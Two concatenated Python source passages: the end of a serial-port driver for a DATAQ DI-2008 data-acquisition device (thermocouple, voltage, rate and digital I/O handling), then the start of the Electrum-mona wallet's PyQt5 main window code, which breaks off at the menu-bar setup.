ValueError('valid values for analog range: ' f'{", ".join(strings)}') if analog_range >= 1.0: configuration |= (1 << self._range_bit) # set the range bit analog_range /= 100 # change the range to make lookup easier range_lookup = { 0.5: 0, 0.25: 1, 0.1: 2, 0.05: 3, 0.025: 4, 0.01: 5 } configuration |= (range_lookup[analog_range] << self._scale_bit) if thermocouple_type is not None: if thermocouple_type.lower() not in 'bejknrst': self._logger.warning(f'thermocouple type must be valid') return configuration |= 1 << self._mode_bit # set the mode bit thermo_lookup = { 'b': 0, 'e': 1, 'j': 2, 'k': 3, 'n': 4, 'r': 5, 's': 6, 't': 7 } configuration |= (thermo_lookup[thermocouple_type.lower()] << self._scale_bit) filter_types = ['last point', 'average', 'maximum', 'minimum'] if filter.lower() not in filter_types: raise ValueError(f'the "filter" must be one of the following: ' f'{", ".join(filter_types)}') if filter_decimation < 1 or filter_decimation > 32767: raise ValueError('the "filter_decimation" parameter must be ' 'between 1 and 32767, inclusive') filter_value = filter_types.index(filter.lower()) self.configuration = configuration self.commands += [f'filter {channel-1} {filter_value}', f'dec {filter_decimation}'] @property def _is_tc(self): """ Return 'True' if is a thermocouple, else 'False' """ return (self.configuration & (1 << self._mode_bit)) > 0 def __str__(self): channel = (self.configuration & 0xf) + 1 string = f'analog input, channel {channel} ' if self._is_tc: # string construction for thermocouple type string += 'thermocouple ' tc_ranges = { 0: 'B', 1: 'E', 2: 'J', 3: 'K', 4: 'N', 5: 'R', 6: 'S', 7: 'T' } tc_type = tc_ranges[(self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit] string += f'type {tc_type}' else: string += 'range ' ranges = [0.5, 0.25, 0.1, 0.05, 0.025, 0.01] range_bit = self.configuration & (1 << self._range_bit) if range_bit: ranges = [r * 100 for r in ranges] scale_factor = (self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit range_value = ranges[scale_factor] string += f'+/-{range_value}V' return string def parse(self, input): """ The ``parse`` method is intended to be called by the Di2008 \ class when it receives data associated with the ``AnalogPort``. :param input: 16-bit integer input representing the 'raw' data stream :return: """ self._last_received = datetime.now() if self._is_tc: if input == 32767: self.value = None self._logger.warning('!!! thermocouple error, cannot ' 'communicate with sensor or the reading ' 'is outside the sensor\'s measurement ' f'range on "{str(self)}"') return elif input == -32768: self.value = None self._logger.warning(f'!!! thermocouple error, thermocouple ' f'open or not connected on "{str(self)}"') return # from datasheet... m_lookup = { 'j': 0.021515, 'k': 0.023987, 't': 0.009155, 'b': 0.023956, 'r': 0.02774, 's': 0.02774, 'e': 0.018311, 'n': 0.022888 } b_lookup = { 'j': 495, 'k': 586, 't': 100, 'b': 1035, 'r': 859, 's': 859, 'e': 400, 'n': 550 } tc_ranges = { 0: 'b', 1: 'e', 2: 'j', 3: 'k', 4: 'n', 5: 'r', 6: 's', 7: 't' } tc_type = tc_ranges[(self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit] m = m_lookup[tc_type] b = b_lookup[tc_type] self.value = input * m + b self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.2f}°C"') if self._callback: self._callback(self.value) return self.value ranges = [0.5, 0.25, 0.1, 0.05, 0.025, 0.01] range_bit = self.configuration & (1 << self._range_bit) if range_bit: ranges = [r * 100 for r in ranges] scale_factor = (self.configuration & (0x7 << self._scale_bit)) \ >> self._scale_bit range_value = ranges[scale_factor] self.value = range_value * float(input) / 32768.0 self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.4f}V"') if self._callback: self._callback(self.value) return self.value class RatePort(Port): """ Digital input port which may be configured as a frequency monitor. :param range_hz: the maximum range of the input, in Hz; valid values are \ in [50000, 20000, 10000, 5000, 2000, 1000, 500, 200, 100, 50, 20, 10] and \ invalid values will raise a ``ValueError`` :param filter_samples: filter samples as defined within the device \ datasheet :param loglevel: the logging level, i.e. ``logging.INFO`` """ def __init__(self, range_hz=50000, filter_samples: int = 32, loglevel=logging.INFO): super().__init__(loglevel=loglevel) rates_lookup = { 50000: 1, 20000: 2, 10000: 3, 5000: 4, 2000: 5, 1000: 6, 500: 7, 200: 8, 100: 9, 50: 10, 20: 11, 10: 12 } valid_rates = [r for r in rates_lookup.keys()] if range_hz not in valid_rates: raise ValueError(f'rate not valid, please choose a valid rate ' f'from the following: {", ".join(valid_rates)}') if not 1 <= filter_samples <= 64: raise ValueError(f'filter_samples not valid, must be ' f'between 1 and 64, inclusive') self.configuration = (rates_lookup[range_hz] << self._scale_bit) + 0x9 self.commands += [f'ffl {filter_samples}'] self._range = range_hz def __str__(self): return f'rate input, {self._range}Hz' def parse(self, input): self._last_received = datetime.now() self.value = self._range * (input + 32768) / 65536 self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.4f}Hz"') if self._callback: self._callback(self.value) return self.value class CountPort(Port): """ todo: Implement and document CountPort """ def __init__(self, loglevel=logging.DEBUG): super().__init__(loglevel=loglevel) self.configuration = 0xa raise NotImplementedError class DigitalPort(Port): """ A digital input/output port. :param channel: an integer corresponding to the digital channels as seen \ on the front face of the device (zero-indexed) :param output: a boolean value, ``True`` if the channel is to be an output \ else false. :param loglevel: the logging level to apply to the digital port. """ def __init__(self, channel: int, direction: DigitalDirection = DigitalDirection.INPUT, loglevel=logging.INFO): super().__init__(loglevel=loglevel) if channel not in range(0, 7): raise DigitalPortError(f'channel "{channel}" ' 'is not a valid digital channel') self.channel = channel self.direction = direction self.value = False def __repr__(self): direction = 'output' \ if self.direction == DigitalDirection.OUTPUT else 'input' return f'digital {direction} ' \ f'{self.channel}' class Di2008: """ The device controller which implements its own ``threading.Thread`` class \ and processes incomming data based on its defined scan list. The ``port_name`` and ``serial_number`` allow the user to specify a particular device on the bus when there may be more than one device present on the bus. If both ``port_name`` and ``serial_number`` are specified, then ``serial_number`` will take precedence. If neither are specified, then the first instrument found on the bus will be automatically acquired. :param port_name: the COM port (if not specified, the software will \ attempt to find the device) :param serial_number: the serial number of the device to acquire :param timeout: the period of time over which input data is pulled from \ the serial port and processed :param loglevel: the logging level, i.e. ``logging.INFO`` """ def __init__(self, port_name: str = None, serial_number: str = None, timeout=0.05, loglevel=logging.INFO): self._logger = logging.getLogger(self.__class__.__name__) self._logger.setLevel(loglevel) self._timeout = timeout self._scanning = False self._scan_index = 0 self._serial_port = None self._ports = [] self._dio = [DigitalPort(x) for x in range(0, 7)] self._raw = [] self._manufacturer = None self._pid = None self._firmware = None self._esn = None # initialize the command queue with basic information requests self._command_queue = [ 'stop', 'info 0', 'info 1', 'info 2', 'info 6', 'srate 4' ] success = self._discover(port_name, serial_number) if success: self._thread = threading.Thread(target=self._run) self._thread.start() def __str__(self): return f'{self._manufacturer} DI-{self._pid}, serial number ' \ f'{self._esn}, firmware {self._firmware}' def change_led_color(self, color: 'str'): """ Change the LED color. :param color: the color as a string; valid values are in \ ['black', 'blue', 'green', 'cyan', 'red', 'magenta', 'yellow', \ 'white'] and invalid values will raise a ``ValueError`` :return: None """ colors_lookup = { 'black': 0, 'blue': 1, 'green': 2, 'cyan': 3, 'red': 4, 'magenta': 5, 'yellow': 6, 'white': 7 } valid_colors = [c for c in colors_lookup.keys()] if color.lower() not in valid_colors: raise ValueError(f'color not valid, should be one of ' f'{", ".join(valid_colors)}') self._command_queue.append(f'led {colors_lookup[color.lower()]}') def setup_dio_direction(self, channel: int, direction: DigitalDirection): """ Setup the digital port direction for a single port. :param channel: the channel number :param direction: the ``DigitalDirection`` :return: None """ if channel not in range(0, 7): raise PortNotValidError('the specified port/channel ' f'"{channel}" does not exist') self._logger.info(f'setting digital channel {channel} to {direction}') directions = 0x00 # load the directions from the current dio for i, port in enumerate(self._dio): value = 1 if port.direction == DigitalDirection.OUTPUT else 0 directions |= value << i # modify the direction for the appropriate channel if direction == DigitalDirection.OUTPUT: directions |= 1 << channel else: directions &= ~(1 << channel) self._dio[channel].direction = direction self._command_queue.append(f'endo {directions}') def write_do(self, channel: int, state: bool): """ Writes to any of the digital pins in the switch state. :param channel: an integer indicating the digital output :param state: the value, ``True`` or ``False``; ``True`` releases the \ internal switch, meaning that the output will float up to 5V while \ ``False`` will activate the internal switch, pulling the node to 0V :return: None """ if channel not in range(0, 7): raise PortNotValidError('the specified port/channel ' f'"{channel}" does not exist') self._logger.info(f'setting digital channel {channel} to {state}') values = 0x00 for i, dio in enumerate(self._dio): if dio.direction == DigitalDirection.OUTPUT: if channel == i: state_value = 0 if state else 1 values |= state_value << i dio.value = state else: state_value = 0 if dio.value else 1 values |= state_value << i self._command_queue.append(f'dout {values}') def read_di(self, channel: int): """ Reads the state of any digital input/output :param channel: the channel number as shown on the instrument :return: True if the channel is high, else False """ if channel not in range(0, 7): raise PortNotValidError('the specified port/channel ' f'"{channel}" does not exist') return self._dio[channel].value def create_scan_list(self, scan_list: List[Port]): """ Builds the scan list. This must be done while the instrument is not \ currently scanning or results are unpredictable. :param scan_list: a list of ``Port`` types. :return: True if success, else False """ # create a scan list based on the provided list for port in scan_list: if not isinstance(port, Port): raise ValueError(f'"{port}" is not an instance of Port class') if len(scan_list) > 11: raise ValueError('scan list may only be a maximum ' 'of 11 elements long') # todo: check for duplicates and raise ValueError if duplicate detected self._ports = scan_list # change the packet size based on the scan list length if len(scan_list) < 8: packet_size_id = 0 elif len(scan_list) < 16: packet_size_id = 1 elif len(scan_list) < 32: packet_size_id = 2 else: packet_size_id = 3 self._command_queue.append(f'ps {packet_size_id}') # create the scan list commands = [f'slist {offset} {port.configuration}' for offset, port in enumerate(self._ports)] # add any other port-specific commands for port in self._ports: for command in port.commands: commands.append(command) commands.append('info 9') # shift the entire command list into the transmit queue [self._command_queue.append(c) for c in commands] return True def start(self): """ Starts the device scanning. The scan list must already be defined \ using ``create_scan_list`` method. :return: None """ self._command_queue.append('start') def stop(self): """ Stops the device scanning. :return: """ self._command_queue.append('stop') def close(self): """ Release the device and serial port. :return: None """ self._logger.warning('closing port') if self._serial_port: self._serial_port.close() self._serial_port = None def _recover_buffer_overflow(self): self._command_queue = [] self.stop() self.create_scan_list(self._ports) self.start() def _discover(self, port_name: str = None, serial_number: str = None): if serial_number is not None: port_name = _discover_by_esn(serial_number) elif port_name is None: port_name = _discover_auto() if port_name: self._logger.info(f'device found on {port_name}') self._serial_port = Serial(port_name, baudrate=115200, timeout=0) return True raise ValueError('DI-2008 not found on bus') def _send_cmd(self, command: str): self._logger.debug(f'sending "{command}"') self._serial_port.write(f'{command}\r'.encode()) def _parse_received(self, received): self._logger.debug(f'received from unit: "{received}"') if self._scanning: for i in range(len(received) >> 1): int_value = received[i*2] + received[i*2+1] * 256 if int_value > 32767: int_value = int_value - 65536 self._ports[self._scan_index].parse(int_value) self._scan_index += 1 self._scan_index %= len(self._ports) else: # strip the '0x00' from the received data in non-scan # mode - it only causes problems self._raw += [chr(b) for b in received if b != 0] messages = [] while '\r' in self._raw: self._logger.debug('"\\r" detected, decoding message...') end_index = self._raw.index('\r') message = ''.join(self._raw[:end_index]) messages.append(message) self._logger.debug(f'message received: "{message}"') self._raw = self._raw[end_index:] if self._raw[0] == '\r': self._raw.pop(0) for message in messages: if 'info' in message: self._parse_info(message) elif 'din' in message: self._parse_din(message) else: self._logger.info(f'message could not be parsed: "{message}"') def _parse_info(self, message): if 'info' not in message: return # make numbers to data if 'info 0' in message: self._manufacturer = message.split('info 0')[-1].strip() if self._manufacturer != 'DATAQ': self.close() elif 'info 1' in message: self._pid = message.split('info 1')[-1].strip() if self._pid != '2008': self.close() elif 'info 2' in message: self._firmware = message.split('info 2')[-1].strip() elif 'info 6' in message: self._esn = message.split('info 6')[-1].strip() else: self._logger.warning(f'info message not understood: "{message}"') def _parse_din(self, message): number = int(message.split(' ')[-1].strip()) for i, port in enumerate(self._dio): if port.direction == DigitalDirection.INPUT: if (number & (1 << i)) > 0: port.value = True else: port.value = False self._logger.debug(f'digital {port} is {port.value}') def _maintain_send_queue(self): if len(self._command_queue) > 0: command = self._command_queue.pop(0) if 'start' in command: self._scanning = True self._scan_index = 0 elif 'stop' in command: self._scanning = False # collect the dout commands and only send the most recent if 'dout' in command: dout_indexes = [] for i, cmd in enumerate(self._command_queue): if 'dout' in cmd: dout_indexes.append(i) if len(dout_indexes) == 0: self._send_cmd(command) return command = self._command_queue[dout_indexes[-1]] self._command_queue = [c for c in self._command_queue if 'dout' not in c] self._send_cmd(command) else: self._send_cmd(command) else: # when there is nothing else to do, poll the digital inputs... self._command_queue.append('din') def _run(self): while self._serial_port: try: waiting = self._serial_port.in_waiting except SerialException as e: break if waiting > 0: raw = self._serial_port.read(waiting) self._parse_received(raw) self._maintain_send_queue() sleep(self._timeout) if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) print(_discover_by_esn('5C76AEFA')) print(_discover_by_esn('5D3F3a15')) print(_discover_auto())
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar) import electrum_mona from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum_mona.plugin import run_hook from electrum_mona.i18n import _ from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, InvoiceError) from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED from electrum_mona.transaction import Transaction, TxOutput from electrum_mona.address_synchronizer import AddTransactionException from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum_mona.version import ELECTRUM_VERSION from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum_mona.exchange_rate import FxThread from electrum_mona.simple_config import SimpleConfig from electrum_mona.logging import Logger from electrum_mona.paymentrequest import PR_PAID from electrum_mona.util import pr_expiration_values from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen) from .util import ButtonsTextEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList if TYPE_CHECKING: from . import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 0)) self.completions = QStringListModel() self.send_tab_is_onchain = False self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab(wallet) tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") if self.config.get('lightning'): add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels', 'payment_received', 'payment_status'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'channels': self.channels_list.update_rows.emit() elif event == 'channel': self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'payment_status': self.on_payment_status(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() elif event == 'payment_received': wallet, key, status = args if wallet == self.wallet: self.notify(_('Payment received') + '\n' + key) else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.lnworker: wallet.lnworker.on_channels_updated() self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum-mona Testnet" if constants.net.TESTNET else "Electrum-mona" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() 